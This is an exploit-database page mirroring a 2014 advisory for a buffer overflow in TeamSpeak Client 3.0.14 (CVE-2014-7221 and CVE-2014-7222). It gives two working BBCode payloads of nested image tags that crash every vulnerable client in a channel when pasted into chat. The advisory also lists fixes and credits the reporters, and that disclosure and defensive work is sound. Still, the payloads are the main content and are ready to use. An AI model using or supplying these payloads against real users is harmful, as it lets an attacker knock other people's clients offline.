首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TeamSpeak Client 3.0.14 - Buffer Overflow Vulnerability
来源:http://forum.teamspeak.com 作者:SpyEye 发布时间:2014-10-08  
#################################################################################################
#
# Title                   : TeamSpeak Client v3.0.14 - Buffer Overflow Vulnerability
# Severity                : High+/Critical
# Reporter(s)             : SpyEye & Christian Galeone
# Software Version        : 3.0.14 & Previous Versions
# Software Name           : TeamSpeak Client
# Software Download Link  : http://letoltes.szoftverbazis.hu/IbAi1W2OLVclvRLS2KUGHw/1410984789/teamspeak-3014/TeamSpeak3-Client-win64-3.0.14.exe
# Vendor Home             : http://teamspeak.com/
# Date(s)                 : 01/04/2014 - 0r161n4l c0d3 By SpyEye
#                         : 21/05/2014 - v4r14n7 c0d3 By Christian Galeone
# Tested in               : Win7 - TeamSpeak Client V3.0.14
# CVE(s)                  : CVE-2014-7221 By SpyEye & CVE-2014-7222 By Christian Galeone
#
##################################################################################################
#
# Effects:
#
# Mass Crash Client (You & The User(s) Connected With A Vulnerable Version Into YOUR Channel)
#
# Note:
#
# The Following Code MUST Be Sent Into The Chat/Server Tab For A Channel/Server Crash Effect.
#
# PoC:

#  1) Buffer Overflow Vulnerability - # 0r161n4l c0d3 n.1 # By SpyEye
#
#  CVE: CVE-2014-7221
#
# [img][img]//http://www.teamspeak.com/templates/teamspeak_v3/images/blank.gif[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7a.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7b.png?ver=4.6.0.28[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser75.png?ver=4.6.0.24[/img][/img] [img][img]//http://i.answers.microsoft.com/static/images/defaultuser7z.png?ver=4.6.0.28[/img][/img]
#
#  2) Buffer Overflow Vulnerability - # v4r14n7 c0d3 n.2 # By Christian Galeone
#
#  CVE: CVE-2014-7222
#
# [img][img]\\1\z[/img][/img][img][img]\\2\z[/img][/img][img][img]\\3\z[/img][/img][img][img]\\4\z[/img][/img][img][img]\\5\z[/img][/img][img][img]\\6\z[/img][/img][img][img]\\7\z[/img][/img][img][img]\\8\z[/img][/img][img][img]\\9\z[/img][/img][img][img]\\10\z[/img][/img][img][img]\\11\z[/img][/img][img][img]\\12\z[/img][/img][img][img]\\13\z[/img][/img][img][img]\\14\z[/img][/img][img][img]\\15\z[/img][/img][img][img]\\16\z[/img][/img][img][img]\\17\z[/img][/img][img][img]\\18\z[/img][/img][img][img]\\1\z[/img][/img][img][img]\\2\z[/img][/img][img][img]\\3\z[/img][/img][img][img]\\4\z[/img][/img][img][img]\\5\z[/img][/img][img][img]\\6\z[/img][/img][img][img]\\7\z[/img][/img][img][img]\\8\z[/img][/img][img][img]\\9\z[/img][/img][img][img]\\10\z[/img][/img][img][img]\\11\z[/img][/img][img][img]\\12\z[/img][/img][img][img]\\13\z[/img][/img]
#
# Fix:
#
# http://screech.me/ts3/plugins/antifreeze.html
#
#                    OR
#
# http://www.teamspeak.com/?page=downloads
#
# Original Source:
#
# http://r4p3.net/public/ts3bbcodefreeze.txt
#
# http://r4p3.net/forum/reverse-engineering/38/teamspeak-3-exploit-bb-code-freeze-crash-not-responding/905/
#
# Credit(s):
#
# SpyEye (http://forum.teamspeak.com/member.php/263635-SpyEye) - 0r161n4l 3xpl017 d3v3l0p3r
#
# Christian Galeone - V4r14n7 3xpl017 d3v3l0p3r
#
#
##################################################################################################
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Flash 14.0.0.145 copyPix
·Ultra Electronics SSL VPN 7.2.
·Internet Explorer 8 - Fixed Co
·XAMPP 1.8.x Multiple Vulnerabi
·Microsoft Exchange IIS HTTP In
·Asx to Mp3 2.7.5 - Stack Overf
·bash代码注入的安全漏洞
·ManageEngine OpManager / Socia
·Dhclient Bash Environment Vari
·HP Network Node Manager I PMD
·Gnu Bash 4.3 CGI REFERER Comma
·Pure-FTPd External Authenticat
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved